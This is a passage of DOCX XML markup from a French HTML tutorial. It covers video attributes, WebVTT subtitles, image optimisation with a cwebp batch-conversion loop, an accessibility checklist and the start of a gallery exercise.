          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Affiche les commandes natives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toujours présent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="186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preload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Quantité de données téléchargées d'avance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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metadata</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1865"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>poster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image affichée avant lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une image légère</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="186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playsinline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Lecture dans la page sur mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Indispensable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1865"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>muted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarre sans son</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requis pour l'autoplay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="186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loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Lecture en boucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Décoration uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1865"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>track</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sous-titres, légendes, descriptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>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Au moins </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kind=subtitles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une vidéo décorative en lecture automatique doit être silencieuse, courte et légère ; elle doit aussi pouvoir être mise en pause. Une vidéo de contenu doit fournir des sous-titres synchronisés au format WebVTT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un fichier de sous-titres WebVTT minimal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WEBVTT</w:t>
        <w:br/>
        <w:br/>
        <w:t>00:00:00.000 --&gt; 00:00:03.200</w:t>
        <w:br/>
        <w:t>Bienvenue dans ce tutoriel HTML.</w:t>
        <w:br/>
        <w:br/>
        <w:t>00:00:03.200 --&gt; 00:00:07.500</w:t>
        <w:br/>
        <w:t>Commencez par créer un fichier index.html.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.6 Optimiser sans dégrader</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Optimiser une image, c'est réduire son poids jusqu'au seuil où l'œil ne perçoit plus de différence. Quatre leviers, dans l'ordre d'efficacité : dimensions correctes, format moderne, compression réglée, chargement différé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.22 — Cinq leviers d'optimisation, du plus au moins rentable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32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Levier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Gain typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Redimensionner à la taille d'affichage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2214"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>50 à 80 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3479"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sharp, ImageMagick</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Passer au WebP ou AVIF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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25 à 50 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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cwebp, avifenc, Squoosh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Régler la qualité à 75-85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2214"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 à 30 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3479"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Squoosh, sharp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Charger en différé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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loading="lazy"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Servir via un CDN d'images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2214"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3479"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloudinary, imgix, Netlify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une conversion par lot en ligne de commande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Convertir un dossier d'images en WebP, qualité 80</w:t>
        <w:br/>
        <w:t>$ for f in images/*.{jpg,png}; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cwebp -q 80 "$f" -o "${f%.*}.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  done</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier les gains</w:t>
        <w:br/>
        <w:t>$ du -sh images/</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VÉRIFIER AVANT DE PUBLIER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Chaque image a-t-elle un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> justifié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Chaque image a-t-elle </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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Les images hors écran sont-elles en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lazy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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Les vidéos ont-elles des sous-titres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 poids total de la page reste-t-il sous 1,5 Mo ?</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format se choisit selon l'usage : photo, logo, capture, animation.</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alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit le contenu, jamais le fichier ni le format.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Une image décorative a un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vide, pas un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> absent.</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width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réservent l'espace et évitent les sauts de page.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srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>picture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évitent d'envoyer 2400 pixels à un téléphone.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vidéo sans sous-titres exclut une partie du public.</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Optimiser, c'est réduire le poids sous le seuil de perception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les médias sont en place. Le chapitre suivant traite les données structurées : tableaux, et tout ce qui fait la différence entre un tableau de données et une grille dessinée.</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6.1 — Rendre une galerie accessible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Voici une galerie de trois images, sans texte alternatif correct.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 xml:space="preserve">Rédigez un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adapté à chaque image.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Ajoutez les dimensions et le chargement différé.</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 xml:space="preserve">Enveloppez chaque image dans une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec sa légende.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
